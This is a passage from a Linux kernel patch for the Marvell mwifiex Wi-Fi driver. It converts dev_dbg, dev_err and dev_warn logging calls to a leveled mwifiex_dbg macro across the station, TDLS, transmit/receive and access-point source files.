mwifiex_stop_net_dev_queue(priv->netdev, adapter); if (netif_carrier_ok(priv->netdev)) @@ -355,15 +360,17 @@ int mwifiex_bss_start(struct mwifiex_private *priv, struct cfg80211_bss *bss, netif_carrier_off(priv->netdev); if (!ret) { - dev_dbg(adapter->dev, "info: network found in scan" - " list. Joining...\n"); + mwifiex_dbg(adapter, INFO, + "info: network found in scan\t" + " list. Joining...\n"); ret = mwifiex_adhoc_join(priv, bss_desc); if (bss) cfg80211_put_bss(priv->adapter->wiphy, bss); } else { - dev_dbg(adapter->dev, "info: Network not found in " - "the list, creating adhoc with ssid = %s\n", - req_ssid->ssid); + mwifiex_dbg(adapter, INFO, + "info: Network not found in\t" + "the list, creating adhoc with ssid = %s\n", + req_ssid->ssid); ret = mwifiex_adhoc_start(priv, req_ssid); } } @@ -398,8 +405,9 @@ int mwifiex_set_hs_params(struct mwifiex_private *priv, u16 action, switch (action) { case HostCmd_ACT_GEN_SET: if (adapter->pps_uapsd_mode) { - dev_dbg(adapter->dev, "info: Host Sleep IOCTL" - " is blocked in UAPSD/PPS mode\n"); + mwifiex_dbg(adapter, INFO, + "info: Host Sleep IOCTL\t" + "is blocked in UAPSD/PPS mode\n"); status = -1; break; } @@ -496,7 +504,8 @@ int mwifiex_enable_hs(struct mwifiex_adapter *adapter) } if (adapter->hs_activated) { - dev_dbg(adapter->dev, "cmd: HS Already activated\n"); + mwifiex_dbg(adapter, CMD, + "cmd: HS Already activated\n"); return true; } @@ -512,14 +521,16 @@ int mwifiex_enable_hs(struct mwifiex_adapter *adapter) MWIFIEX_BSS_ROLE_STA), HostCmd_ACT_GEN_SET, MWIFIEX_SYNC_CMD, &hscfg)) { - dev_err(adapter->dev, "IOCTL request HS enable failed\n"); + mwifiex_dbg(adapter, ERROR, + "IOCTL request HS enable failed\n"); return false; } if (wait_event_interruptible_timeout(adapter->hs_activate_wait_q, adapter->hs_activate_wait_q_woken, (10 * HZ)) <= 0) { - dev_err(adapter->dev, "hs_activate_wait_q terminated\n"); + mwifiex_dbg(adapter, ERROR, + "hs_activate_wait_q terminated\n"); return false; } @@ -639,10 +650,11 @@ int mwifiex_set_tx_power(struct mwifiex_private *priv, dbm = (u16) power_cfg->power_level; if ((dbm < priv->min_tx_power_level) || (dbm > priv->max_tx_power_level)) { - dev_err(priv->adapter->dev, "txpower value %d dBm" - " is out of range (%d dBm-%d dBm)\n", - dbm, priv->min_tx_power_level, - priv->max_tx_power_level); + mwifiex_dbg(priv->adapter, ERROR, + "txpower value %d dBm\t" + "is out of range (%d dBm-%d dBm)\n", + dbm, priv->min_tx_power_level, + priv->max_tx_power_level); return -1; } } @@ -741,14 +753,15 @@ static int mwifiex_set_wpa_ie_helper(struct mwifiex_private *priv, { if (ie_len) { if (ie_len > sizeof(priv->wpa_ie)) { - dev_err(priv->adapter->dev, - "failed to copy WPA IE, too big\n"); + mwifiex_dbg(priv->adapter, ERROR, + "failed to copy WPA IE, too big\n"); return -1; } memcpy(priv->wpa_ie, ie_data_ptr, ie_len); priv->wpa_ie_len = (u8) ie_len; - dev_dbg(priv->adapter->dev, "cmd: Set Wpa_ie_len=%d IE=%#x\n", - priv->wpa_ie_len, priv->wpa_ie[0]); + mwifiex_dbg(priv->adapter, CMD, + "cmd: Set Wpa_ie_len=%d IE=%#x\n", + priv->wpa_ie_len, priv->wpa_ie[0]); if (priv->wpa_ie[0] == WLAN_EID_VENDOR_SPECIFIC) { priv->sec_info.wpa_enabled = true; @@ -761,8 +774,9 @@ static int mwifiex_set_wpa_ie_helper(struct mwifiex_private *priv, } else { memset(priv->wpa_ie, 0, sizeof(priv->wpa_ie)); priv->wpa_ie_len = 0; - dev_dbg(priv->adapter->dev, "info: reset wpa_ie_len=%d IE=%#x\n", - priv->wpa_ie_len, priv->wpa_ie[0]); + mwifiex_dbg(priv->adapter, INFO, + "info: reset wpa_ie_len=%d IE=%#x\n", + priv->wpa_ie_len, priv->wpa_ie[0]); priv->sec_info.wpa_enabled = false; priv->sec_info.wpa2_enabled = false; } @@ -782,23 +796,24 @@ static int mwifiex_set_wapi_ie(struct mwifiex_private *priv, { if (ie_len) { if (ie_len > sizeof(priv->wapi_ie)) { - dev_dbg(priv->adapter->dev, - "info: failed to copy WAPI IE, too big\n"); + mwifiex_dbg(priv->adapter, ERROR, + "info: failed to copy WAPI IE, too big\n"); return -1; } memcpy(priv->wapi_ie, ie_data_ptr, ie_len); priv->wapi_ie_len = ie_len; - dev_dbg(priv->adapter->dev, "cmd: Set wapi_ie_len=%d IE=%#x\n", - priv->wapi_ie_len, priv->wapi_ie[0]); + mwifiex_dbg(priv->adapter, CMD, + "cmd: Set wapi_ie_len=%d IE=%#x\n", + priv->wapi_ie_len, priv->wapi_ie[0]); if (priv->wapi_ie[0] == WLAN_EID_BSS_AC_ACCESS_DELAY) priv->sec_info.wapi_enabled = true; } else { memset(priv->wapi_ie, 0, sizeof(priv->wapi_ie)); priv->wapi_ie_len = ie_len; - dev_dbg(priv->adapter->dev, - "info: Reset wapi_ie_len=%d IE=%#x\n", - priv->wapi_ie_len, priv->wapi_ie[0]); + mwifiex_dbg(priv->adapter, INFO, + "info: Reset wapi_ie_len=%d IE=%#x\n", + priv->wapi_ie_len, priv->wapi_ie[0]); priv->sec_info.wapi_enabled = false; } return 0; @@ -816,8 +831,8 @@ static int mwifiex_set_wps_ie(struct mwifiex_private *priv, { if (ie_len) { if (ie_len > MWIFIEX_MAX_VSIE_LEN) { - dev_dbg(priv->adapter->dev, - "info: failed to copy WPS IE, too big\n"); + mwifiex_dbg(priv->adapter, ERROR, + "info: failed to copy WPS IE, too big\n"); return -1; } @@ -827,13 +842,14 @@ static int mwifiex_set_wps_ie(struct mwifiex_private *priv, memcpy(priv->wps_ie, ie_data_ptr, ie_len); priv->wps_ie_len = ie_len; - dev_dbg(priv->adapter->dev, "cmd: Set wps_ie_len=%d IE=%#x\n", - priv->wps_ie_len, priv->wps_ie[0]); + mwifiex_dbg(priv->adapter, CMD, + "cmd: Set wps_ie_len=%d IE=%#x\n", + priv->wps_ie_len, priv->wps_ie[0]); } else { kfree(priv->wps_ie); priv->wps_ie_len = ie_len; - dev_dbg(priv->adapter->dev, - "info: Reset wps_ie_len=%d\n", priv->wps_ie_len); + mwifiex_dbg(priv->adapter, INFO, + "info: Reset wps_ie_len=%d\n", priv->wps_ie_len); } return 0; } @@ -877,8 +893,8 @@ static int mwifiex_sec_ioctl_set_wep_key(struct mwifiex_private *priv, /* Copy the required key as the current key */ wep_key = &priv->wep_key[index]; if (!wep_key->key_length) { - dev_err(adapter->dev, - "key not set, so cannot enable it\n"); + mwifiex_dbg(adapter, ERROR, + "key not set, so cannot enable it\n"); return -1; } @@ -955,7 +971,8 @@ static int mwifiex_sec_ioctl_set_wpa_key(struct mwifiex_private *priv, /* Current driver only supports key length of up to 32 bytes */ if (encrypt_key->key_len > WLAN_MAX_KEY_LEN) { - dev_err(priv->adapter->dev, "key length too long\n"); + mwifiex_dbg(priv->adapter, ERROR, + "key length too long\n"); return -1; } @@ -1042,7 +1059,7 @@ mwifiex_drv_get_driver_version(struct mwifiex_adapter *adapter, char *version, snprintf(version, max_len, driver_version, fw_ver); - dev_dbg(adapter->dev, "info: MWIFIEX VERSION: %s\n", version); + mwifiex_dbg(adapter, MSG, "info: MWIFIEX VERSION: %s\n", version); return 0; } @@ -1130,7 +1147,8 @@ mwifiex_remain_on_chan_cfg(struct mwifiex_private *priv, u16 action, } if (mwifiex_send_cmd(priv, HostCmd_CMD_REMAIN_ON_CHAN, action, 0, &roc_cfg, true)) { - dev_err(priv->adapter->dev, "failed to remain on channel\n"); + mwifiex_dbg(priv->adapter, ERROR, + "failed to remain on channel\n"); return -1; } @@ -1315,8 +1333,8 @@ mwifiex_set_gen_ie_helper(struct mwifiex_private *priv, u8 *ie_data_ptr, if ((pvendor_ie->element_id == WLAN_EID_VENDOR_SPECIFIC) && (!memcmp(pvendor_ie->oui, wps_oui, sizeof(wps_oui)))) { priv->wps.session_enable = true; - dev_dbg(priv->adapter->dev, - "info: WPS Session Enabled.\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: WPS Session Enabled.\n"); ret = mwifiex_set_wps_ie(priv, ie_data_ptr, ie_len); } @@ -1363,7 +1381,8 @@ static int mwifiex_misc_ioctl_gen_ie(struct mwifiex_private *priv, memset(adapter->arp_filter, 0, sizeof(adapter->arp_filter)); if (gen_ie->len > ARP_FILTER_MAX_BUF_SIZE) { adapter->arp_filter_size = 0; - dev_err(adapter->dev, "invalid ARP filter size\n"); + mwifiex_dbg(adapter, ERROR, + "invalid ARP filter size\n"); return -1; } else { memcpy(adapter->arp_filter, gen_ie->ie_data, @@ -1372,7 +1391,7 @@ static int mwifiex_misc_ioctl_gen_ie(struct mwifiex_private *priv, } break; default: - dev_err(adapter->dev, "invalid IE type\n"); + mwifiex_dbg(adapter, ERROR, "invalid IE type\n"); return -1; } return 0; diff --git a/drivers/net/wireless/mwifiex/sta_rx.c b/drivers/net/wireless/mwifiex/sta_rx.c index b8729c9394e9..d4d4cb1ce95b 100644 --- a/drivers/net/wireless/mwifiex/sta_rx.c +++ b/drivers/net/wireless/mwifiex/sta_rx.c @@ -141,7 +141,7 @@ int mwifiex_process_rx_packet(struct mwifiex_private *priv, if (priv->hs2_enabled && mwifiex_discard_gratuitous_arp(priv, skb)) { - dev_dbg(priv->adapter->dev, "Bypassed Gratuitous ARP\n"); + mwifiex_dbg(priv->adapter, INFO, "Bypassed Gratuitous ARP\n"); dev_kfree_skb_any(skb); return 0; } @@ -166,7 +166,8 @@ int mwifiex_process_rx_packet(struct mwifiex_private *priv, ret = mwifiex_recv_packet(priv, skb); if (ret == -1) - dev_err(priv->adapter->dev, "recv packet failed\n"); + mwifiex_dbg(priv->adapter, ERROR, + "recv packet failed\n"); return ret; } @@ -203,9 +204,9 @@ int mwifiex_process_sta_rx_packet(struct mwifiex_private *priv, rx_pkt_hdr = (void *)local_rx_pd + rx_pkt_offset; if ((rx_pkt_offset + rx_pkt_length) > (u16) skb->len) { - dev_err(adapter->dev, - "wrong rx packet: len=%d, rx_pkt_offset=%d, rx_pkt_length=%d\n", - skb->len, rx_pkt_offset, rx_pkt_length); + mwifiex_dbg(adapter, ERROR, + "wrong rx packet: len=%d, rx_pkt_offset=%d, rx_pkt_length=%d\n", + skb->len, rx_pkt_offset, rx_pkt_length); priv->stats.rx_dropped++; dev_kfree_skb_any(skb); return ret; @@ -214,7 +215,7 @@ int mwifiex_process_sta_rx_packet(struct mwifiex_private *priv, if (rx_pkt_type == PKT_TYPE_MGMT) { ret = mwifiex_process_mgmt_packet(priv, skb); if (ret) - dev_err(adapter->dev, "Rx of mgmt packet failed"); + mwifiex_dbg(adapter, ERROR, "Rx of mgmt packet failed"); dev_kfree_skb_any(skb); return ret; } diff --git a/drivers/net/wireless/mwifiex/sta_tx.c b/drivers/net/wireless/mwifiex/sta_tx.c index 5ce2d9a4f919..355ac5904fac 100644 --- a/drivers/net/wireless/mwifiex/sta_tx.c +++ b/drivers/net/wireless/mwifiex/sta_tx.c @@ -53,7 +53,8 @@ void *mwifiex_process_sta_txpd(struct mwifiex_private *priv, INTF_HEADER_LEN; if (!skb->len) { - dev_err(adapter->dev, "Tx: bad packet length: %d\n", skb->len); + mwifiex_dbg(adapter, ERROR, + "Tx: bad packet length: %d\n", skb->len); tx_info->status_code = -1; return skb->data; } @@ -184,21 +185,24 @@ int mwifiex_send_null_packet(struct mwifiex_private *priv, u8 flags) switch (ret) { case -EBUSY: dev_kfree_skb_any(skb); - dev_err(adapter->dev, "%s: host_to_card failed: ret=%d\n", - __func__, ret); + mwifiex_dbg(adapter, ERROR, + "%s: host_to_card failed: ret=%d\n", + __func__, ret); adapter->dbg.num_tx_host_to_card_failure++; break; case -1: adapter->data_sent = false; dev_kfree_skb_any(skb); - dev_err(adapter->dev, "%s: host_to_card failed: ret=%d\n", - __func__, ret); + mwifiex_dbg(adapter, ERROR, + "%s: host_to_card failed: ret=%d\n", + __func__, ret); adapter->dbg.num_tx_host_to_card_failure++; break; case 0: dev_kfree_skb_any(skb); - dev_dbg(adapter->dev, "data: %s: host_to_card succeeded\n", - __func__); + mwifiex_dbg(adapter, DATA, + "data: %s: host_to_card succeeded\n", + __func__); adapter->tx_lock_flag = true; break; case -EINPROGRESS: diff --git a/drivers/net/wireless/mwifiex/tdls.c b/drivers/net/wireless/mwifiex/tdls.c index 275a476f0dc7..2faa1bc42abe 100644 --- a/drivers/net/wireless/mwifiex/tdls.c +++ b/drivers/net/wireless/mwifiex/tdls.c @@ -37,7 +37,7 @@ static void mwifiex_restore_tdls_packets(struct mwifiex_private *priv, u32 tid; u8 tid_down; - dev_dbg(priv->adapter->dev, "%s: %pM\n", __func__, mac); + mwifiex_dbg(priv->adapter, DATA, "%s: %pM\n", __func__, mac); spin_lock_irqsave(&priv->wmm.ra_list_spinlock, flags); skb_queue_walk_safe(&priv->tdls_txq, skb, tmp) { @@ -94,7 +94,7 @@ static void mwifiex_hold_tdls_packets(struct mwifiex_private *priv, unsigned long flags; int i; - dev_dbg(priv->adapter->dev, "%s: %pM\n", __func__, mac); + mwifiex_dbg(priv->adapter, DATA, "%s: %pM\n", __func__, mac); spin_lock_irqsave(&priv->wmm.ra_list_spinlock, flags); for (i = 0; i < MAX_NUM_TID; i++) { @@ -132,8 +132,8 @@ mwifiex_tdls_append_rates_ie(struct mwifiex_private *priv, supp_rates_size = min_t(u16, rates_size, MWIFIEX_TDLS_SUPPORTED_RATES); if (skb_tailroom(skb) < rates_size + 4) { - dev_err(priv->adapter->dev, - "Insuffient space while adding rates\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Insuffient space while adding rates\n"); return -ENOMEM; } @@ -199,8 +199,8 @@ mwifiex_tdls_add_ht_oper(struct mwifiex_private *priv, const u8 *mac, sta_ptr = mwifiex_get_sta_entry(priv, mac); if (unlikely(!sta_ptr)) { - dev_warn(priv->adapter->dev, - "TDLS peer station not found in list\n"); + mwifiex_dbg(priv->adapter, ERROR, + "TDLS peer station not found in list\n"); return -1; } @@ -247,15 +247,16 @@ static int mwifiex_tdls_add_vht_oper(struct mwifiex_private *priv, sta_ptr = mwifiex_get_sta_entry(priv, mac); if (unlikely(!sta_ptr)) { - dev_warn(adapter->dev, "TDLS peer station not found in list\n"); + mwifiex_dbg(adapter, ERROR, + "TDLS peer station not found in list\n"); return -1; } if (!mwifiex_is_bss_in_11ac_mode(priv)) { if (sta_ptr->tdls_cap.extcap.ext_capab[7] & WLAN_EXT_CAPA8_TDLS_WIDE_BW_ENABLED) { - dev_dbg(adapter->dev, - "TDLS peer doesn't support wider bandwidth\n"); + mwifiex_dbg(adapter, WARN, + "TDLS peer doesn't support wider bandwidth\n"); return 0; } } else { @@ -554,7 +555,7 @@ static int mwifiex_prep_tdls_encap_data(struct mwifiex_private *priv, tf->u.discover_req.dialog_token = dialog_token; break; default: - dev_err(priv->adapter->dev, "Unknown TDLS frame type.\n"); + mwifiex_dbg(priv->adapter, ERROR, "Unknown TDLS frame type.\n"); return -EINVAL; } @@ -608,8 +609,8 @@ int mwifiex_send_tdls_data_frame(struct mwifiex_private *priv, const u8 *peer, skb = dev_alloc_skb(skb_len); if (!skb) { - dev_err(priv->adapter->dev, - "allocate skb failed for management frame\n"); + mwifiex_dbg(priv->adapter, ERROR, + "allocate skb failed for management frame\n"); return -ENOMEM; } skb_reserve(skb, MWIFIEX_MIN_DATA_HEADER_LEN); @@ -742,7 +743,7 @@ mwifiex_construct_tdls_action_frame(struct mwifiex_private *priv, mwifiex_tdls_add_qos_capab(skb); break; default: - dev_err(priv->adapter->dev, "Unknown TDLS action frame type\n"); + mwifiex_dbg(priv->adapter, ERROR, "Unknown TDLS action frame type\n"); return -EINVAL; } @@ -781,8 +782,8 @@ int mwifiex_send_tdls_action_frame(struct mwifiex_private *priv, const u8 *peer, skb = dev_alloc_skb(skb_len); if (!skb) { - dev_err(priv->adapter->dev, - "allocate skb failed for management frame\n"); + mwifiex_dbg(priv->adapter, ERROR, + "allocate skb failed for management frame\n"); return -ENOMEM; } @@ -848,8 +849,8 @@ void mwifiex_process_tdls_action_frame(struct mwifiex_private *priv, peer = buf + ETH_ALEN; action = *(buf + sizeof(struct ethhdr) + 2); - dev_dbg(priv->adapter->dev, - "rx:tdls action: peer=%pM, action=%d\n", peer, action); + mwifiex_dbg(priv->adapter, DATA, + "rx:tdls action: peer=%pM, action=%d\n", peer, action); switch (action) { case WLAN_TDLS_SETUP_REQUEST: @@ -880,7 +881,7 @@ void mwifiex_process_tdls_action_frame(struct mwifiex_private *priv, ie_len = len - sizeof(struct ethhdr) - TDLS_CONFIRM_FIX_LEN; break; default: - dev_dbg(priv->adapter->dev, "Unknown TDLS frame type.\n"); + mwifiex_dbg(priv->adapter, ERROR, "Unknown TDLS frame type.\n"); return; } @@ -967,8 +968,8 @@ mwifiex_tdls_process_config_link(struct mwifiex_private *priv, const u8 *peer) sta_ptr = mwifiex_get_sta_entry(priv, peer); if (!sta_ptr || sta_ptr->tdls_status == TDLS_SETUP_FAILURE) { - dev_err(priv->adapter->dev, - "link absent for peer %pM; cannot config\n", peer); + mwifiex_dbg(priv->adapter, ERROR, + "link absent for peer %pM; cannot config\n", peer); return -EINVAL; } @@ -988,8 +989,8 @@ mwifiex_tdls_process_create_link(struct mwifiex_private *priv, const u8 *peer) sta_ptr = mwifiex_get_sta_entry(priv, peer); if (sta_ptr && sta_ptr->tdls_status == TDLS_SETUP_INPROGRESS) { - dev_dbg(priv->adapter->dev, - "Setup already in progress for peer %pM\n", peer); + mwifiex_dbg(priv->adapter, WARN, + "Setup already in progress for peer %pM\n", peer); return 0; } @@ -1046,8 +1047,8 @@ mwifiex_tdls_process_enable_link(struct mwifiex_private *priv, const u8 *peer) sta_ptr = mwifiex_get_sta_entry(priv, peer); if (sta_ptr && (sta_ptr->tdls_status != TDLS_SETUP_FAILURE)) { - dev_dbg(priv->adapter->dev, - "tdls: enable link %pM success\n", peer); + mwifiex_dbg(priv->adapter, MSG, + "tdls: enable link %pM success\n", peer); sta_ptr->tdls_status = TDLS_SETUP_COMPLETE; @@ -1076,8 +1077,8 @@ mwifiex_tdls_process_enable_link(struct mwifiex_private *priv, const u8 *peer) mwifiex_auto_tdls_update_peer_status(priv, peer, TDLS_SETUP_COMPLETE); } else { - dev_dbg(priv->adapter->dev, - "tdls: enable link %pM failed\n", peer); + mwifiex_dbg(priv->adapter, ERROR, + "tdls: enable link %pM failed\n", peer); if (sta_ptr) { mwifiex_11n_cleanup_reorder_tbl(priv); spin_lock_irqsave(&priv->wmm.ra_list_spinlock, @@ -1180,9 +1181,9 @@ void mwifiex_disable_all_tdls_links(struct mwifiex_private *priv) tdls_oper.tdls_action = MWIFIEX_TDLS_DISABLE_LINK; if (mwifiex_send_cmd(priv, HostCmd_CMD_TDLS_OPER, HostCmd_ACT_GEN_SET, 0, &tdls_oper, false)) - dev_warn(priv->adapter->dev, - "Disable link failed for TDLS peer %pM", - sta_ptr->mac_addr); + mwifiex_dbg(priv->adapter, ERROR, + "Disable link failed for TDLS peer %pM", + sta_ptr->mac_addr); } mwifiex_del_all_sta_list(priv); @@ -1204,9 +1205,9 @@ int mwifiex_tdls_check_tx(struct mwifiex_private *priv, struct sk_buff *skb) (peer->failure_count < MWIFIEX_TDLS_MAX_FAIL_COUNT)) { peer->tdls_status = TDLS_SETUP_INPROGRESS; - dev_dbg(priv->adapter->dev, - "setup TDLS link, peer=%pM rssi=%d\n", - peer->mac_addr, peer->rssi); + mwifiex_dbg(priv->adapter, INFO, + "setup TDLS link, peer=%pM rssi=%d\n", + peer->mac_addr, peer->rssi); cfg80211_tdls_oper_request(priv->netdev, peer->mac_addr, @@ -1272,8 +1273,8 @@ void mwifiex_add_auto_tdls_peer(struct mwifiex_private *priv, const u8 *mac) tdls_peer->rssi_jiffies = jiffies; INIT_LIST_HEAD(&tdls_peer->list); list_add_tail(&tdls_peer->list, &priv->auto_tdls_list); - dev_dbg(priv->adapter->dev, "Add auto TDLS peer= %pM to list\n", - mac); + mwifiex_dbg(priv->adapter, INFO, + "Add auto TDLS peer= %pM to list\n", mac); } spin_unlock_irqrestore(&priv->auto_tdls_lock, flags); @@ -1341,8 +1342,8 @@ void mwifiex_check_auto_tdls(unsigned long context) return; if (!priv->auto_tdls_timer_active) { - dev_dbg(priv->adapter->dev, - "auto TDLS timer inactive; return"); + mwifiex_dbg(priv->adapter, INFO, + "auto TDLS timer inactive; return"); return; } @@ -1368,9 +1369,9 @@ void mwifiex_check_auto_tdls(unsigned long context) !tdls_peer->rssi) && tdls_peer->tdls_status == TDLS_SETUP_COMPLETE) { tdls_peer->tdls_status = TDLS_LINK_TEARDOWN; - dev_dbg(priv->adapter->dev, - "teardown TDLS link,peer=%pM rssi=%d\n", - tdls_peer->mac_addr, -tdls_peer->rssi); + mwifiex_dbg(priv->adapter, MSG, + "teardown TDLS link,peer=%pM rssi=%d\n", + tdls_peer->mac_addr, -tdls_peer->rssi); tdls_peer->do_discover = true; priv->check_tdls_tx = true; cfg80211_tdls_oper_request(priv->netdev, @@ -1384,9 +1385,10 @@ void mwifiex_check_auto_tdls(unsigned long context) MWIFIEX_TDLS_MAX_FAIL_COUNT) { priv->check_tdls_tx = true; tdls_peer->do_setup = true; - dev_dbg(priv->adapter->dev, - "check TDLS with peer=%pM rssi=%d\n", - tdls_peer->mac_addr, -tdls_peer->rssi); + mwifiex_dbg(priv->adapter, INFO, + "check TDLS with peer=%pM\t" + "rssi=%d\n", tdls_peer->mac_addr, + tdls_peer->rssi); } } spin_unlock_irqrestore(&priv->auto_tdls_lock, flags); diff --git a/drivers/net/wireless/mwifiex/txrx.c b/drivers/net/wireless/mwifiex/txrx.c index 73082b51f6e1..28dcc84a34d2 100644 --- a/drivers/net/wireless/mwifiex/txrx.c +++ b/drivers/net/wireless/mwifiex/txrx.c @@ -50,7 +50,8 @@ int mwifiex_handle_rx_packet(struct mwifiex_adapter *adapter, priv = mwifiex_get_priv(adapter, MWIFIEX_BSS_ROLE_ANY); if (!priv) { - dev_err(adapter->dev, "data: priv not found. Drop RX packet\n"); + mwifiex_dbg(adapter, ERROR, + "data: priv not found. Drop RX packet\n"); dev_kfree_skb_any(skb); return -1; } @@ -120,7 +121,7 @@ int mwifiex_process_tx(struct mwifiex_private *priv, struct sk_buff *skb, switch (ret) { case -ENOSR: - dev_dbg(adapter->dev, "data: -ENOSR is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -ENOSR is returned\n"); break; case -EBUSY: if ((GET_BSS_ROLE(priv) == MWIFIEX_BSS_ROLE_STA) && @@ -129,13 +130,14 @@ int mwifiex_process_tx(struct mwifiex_private *priv, struct sk_buff *skb, if (local_tx_pd) local_tx_pd->flags = 0; } - dev_dbg(adapter->dev, "data: -EBUSY is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -EBUSY is returned\n"); break; case -1: if (adapter->iface_type != MWIFIEX_PCIE) adapter->data_sent = false; - dev_err(adapter->dev, "mwifiex_write_data_async failed: 0x%X\n", - ret); + mwifiex_dbg(adapter, ERROR, + "mwifiex_write_data_async failed: 0x%X\n", + ret); adapter->dbg.num_tx_host_to_card_failure++; mwifiex_write_data_complete(adapter, skb, 0, ret); break; @@ -167,7 +169,8 @@ static int mwifiex_host_to_card(struct mwifiex_adapter *adapter, priv = mwifiex_get_priv_by_id(adapter, tx_info->bss_num, tx_info->bss_type); if (!priv) { - dev_err(adapter->dev, "data: priv not found. Drop TX packet\n"); + mwifiex_dbg(adapter, ERROR, + "data: priv not found. Drop TX packet\n"); adapter->dbg.num_tx_host_to_card_failure++; mwifiex_write_data_complete(adapter, skb, 0, 0); return ret; @@ -192,7 +195,7 @@ static int mwifiex_host_to_card(struct mwifiex_adapter *adapter, } switch (ret) { case -ENOSR: - dev_err(adapter->dev, "data: -ENOSR is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -ENOSR is returned\n"); break; case -EBUSY: if ((GET_BSS_ROLE(priv) == MWIFIEX_BSS_ROLE_STA) && @@ -207,13 +210,13 @@ static int mwifiex_host_to_card(struct mwifiex_adapter *adapter, atomic_add(tx_info->aggr_num, &adapter->tx_queued); else atomic_inc(&adapter->tx_queued); - dev_dbg(adapter->dev, "data: -EBUSY is returned\n"); + mwifiex_dbg(adapter, ERROR, "data: -EBUSY is returned\n"); break; case -1: if (adapter->iface_type != MWIFIEX_PCIE) adapter->data_sent = false; - dev_err(adapter->dev, "mwifiex_write_data_async failed: 0x%X\n", - ret); + mwifiex_dbg(adapter, ERROR, + "mwifiex_write_data_async failed: 0x%X\n", ret); adapter->dbg.num_tx_host_to_card_failure++; mwifiex_write_data_complete(adapter, skb, 0, ret); break; @@ -324,7 +327,7 @@ int mwifiex_write_data_complete(struct mwifiex_adapter *adapter, txq = netdev_get_tx_queue(priv->netdev, index); if (netif_tx_queue_stopped(txq)) { netif_tx_wake_queue(txq); - dev_dbg(adapter->dev, "wake queue: %d\n", index); + mwifiex_dbg(adapter, DATA, "wake queue: %d\n", index); } } done: diff --git a/drivers/net/wireless/mwifiex/uap_cmd.c b/drivers/net/wireless/mwifiex/uap_cmd.c index 3d0281190b9d..a4ae28353b6d 100644 --- a/drivers/net/wireless/mwifiex/uap_cmd.c +++ b/drivers/net/wireless/mwifiex/uap_cmd.c @@ -184,8 +184,8 @@ mwifiex_set_ht_params(struct mwifiex_private *priv, bss_cfg->ht_cap.mcs.rx_mask[1] = 0xff; break; default: - dev_warn(priv->adapter->dev, - "Unsupported RX-STBC, default to 2x2\n"); + mwifiex_dbg(priv->adapter, WARN, + "Unsupported RX-STBC, default to 2x2\n"); bss_cfg->ht_cap.mcs.rx_mask[0] = 0xff; bss_cfg->ht_cap.mcs.rx_mask[1] = 0xff; break; @@ -767,8 +767,8 @@ int mwifiex_uap_prepare_cmd(struct mwifiex_private *priv, u16 cmd_no, return -1; break; default: - dev_err(priv->adapter->dev, - "PREP_CMD: unknown cmd %#x\n", cmd_no); + mwifiex_dbg(priv->adapter, ERROR, + "PREP_CMD: unknown cmd %#x\n", cmd_no); return -1; } @@ -806,24 +806,28 @@ int mwifiex_config_start_uap(struct mwifiex_private *priv, struct mwifiex_uap_bss_param *bss_cfg) { if (mwifiex_del_mgmt_ies(priv)) - dev_err(priv->adapter->dev, "Failed to delete mgmt IEs!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to delete mgmt IEs!\n"); if (mwifiex_send_cmd(priv, HostCmd_CMD_UAP_BSS_STOP, HostCmd_ACT_GEN_SET, 0, NULL, true)) { - dev_err(priv->adapter->dev, "Failed to stop the BSS\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to stop the BSS\n"); return -1; } if (mwifiex_send_cmd(priv, HostCmd_CMD_UAP_SYS_CONFIG, HostCmd_ACT_GEN_SET, UAP_BSS_PARAMS_I, bss_cfg, false)) { - dev_err(priv->adapter->dev, "Failed to set the SSID\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to set the SSID\n"); return -1; } if (mwifiex_send_cmd(priv, HostCmd_CMD_UAP_BSS_START, HostCmd_ACT_GEN_SET, 0, NULL, false)) { - dev_err(priv->adapter->dev, "Failed to start the BSS\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to start the BSS\n"); return -1; } diff --git a/drivers/net/wireless/mwifiex/uap_event.c b/drivers/net/wireless/mwifiex/uap_event.c index f4794cdc36d2..06ce3fe660f1 100644 --- a/drivers/net/wireless/mwifiex/uap_event.c +++ b/drivers/net/wireless/mwifiex/uap_event.c @@ -80,8 +80,8 @@ int mwifiex_process_uap_event(struct mwifiex_private *priv) node = mwifiex_add_sta_entry(priv, event->sta_addr); if (!node) { - dev_warn(adapter->dev, - "could not create station entry!\n"); + mwifiex_dbg(adapter, ERROR, + "could not create station entry!\n"); return -1; } @@ -128,7 +128,8 @@ int mwifiex_process_uap_event(struct mwifiex_private *priv) mwifiex_wake_up_net_dev_queue(priv->netdev, adapter); break; case EVENT_UAP_BSS_START: - dev_dbg(adapter->dev, "AP EVENT: event id: %#x\n", eventcause); + mwifiex_dbg(adapter, EVENT, + "AP EVENT: event id: %#x\n", eventcause); memcpy(priv->netdev->dev_addr, adapter->event_body + 2, ETH_ALEN); if (priv->hist_data) @@ -136,50 +137,53 @@ int mwifiex_process_uap_event(struct mwifiex_private *priv) break; case EVENT_UAP_MIC_COUNTERMEASURES: /* For future development */ - dev_dbg(adapter->dev, "AP EVENT: event id: %#x\n", eventcause); + mwifiex_dbg(adapter, EVENT, + "AP EVENT: event id: %#x\n", eventcause); break; case EVENT_AMSDU_AGGR_CTRL: ctrl = le16_to_cpu(*(__le16 *)adapter->event_body); - dev_dbg(adapter->dev, "event: AMSDU_AGGR_CTRL %d\n", ctrl); + mwifiex_dbg(adapter, EVENT, + "event: AMSDU_AGGR_CTRL %d\n", ctrl); if (priv->media_connected) { adapter->tx_buf_size = min_t(u16, adapter->curr_tx_buf_size, ctrl); - dev_dbg(adapter->dev, "event: tx_buf_size %d\n", - adapter->tx_buf_size); + mwifiex_dbg(adapter, EVENT, + "event: tx_buf_size %d\n", + adapter->tx_buf_size); } break; case EVENT_ADDBA: - dev_dbg(adapter->dev, "event: ADDBA Request\n"); + mwifiex_dbg(adapter, EVENT, "event: ADDBA Request\n"); if (priv->media_connected) mwifiex_send_cmd(priv, HostCmd_CMD_11N_ADDBA_RSP, HostCmd_ACT_GEN_SET, 0, adapter->event_body, false); break; case EVENT_DELBA: - dev_dbg(adapter->dev, "event: DELBA Request\n"); + mwifiex_dbg(adapter, EVENT, "event: DELBA Request\n"); if (priv->media_connected) mwifiex_11n_delete_ba_stream(priv, 